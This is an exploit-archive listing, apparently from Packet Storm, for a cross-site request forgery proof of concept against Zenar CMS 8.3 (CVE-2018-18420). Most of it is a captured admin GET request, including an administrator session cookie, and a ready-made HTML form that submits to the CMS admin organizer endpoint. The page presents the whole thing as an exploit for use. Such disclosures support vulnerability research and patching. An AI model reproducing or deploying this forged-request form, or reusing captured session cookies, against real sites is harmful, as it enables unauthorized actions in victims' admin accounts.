exploit the possibilities

Zenar Content Management System 8.3 Cross Site Request Forgery

Zenar Content Management System 8.3 Cross Site Request Forgery
Posted Oct 18, 2018
Authored by Ismail Tasdelen

Zenar Content Management System version 8.3 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2018-18420
MD5 | 1ca21d4ea7dad9557ab0feb02503c410

Zenar Content Management System 8.3 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software : Zenar Content Management System 8.3
# Version : 8.3
# Vulernability Type : Web Application
# Vulenrability : Cross-Site Request Forgery ( CSRF )
# CVE : CVE-2018-18420

# Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# the 8.3 version of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.

# POC :

# GET Request :

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parametres :

path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

# CSRF HTML :

<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close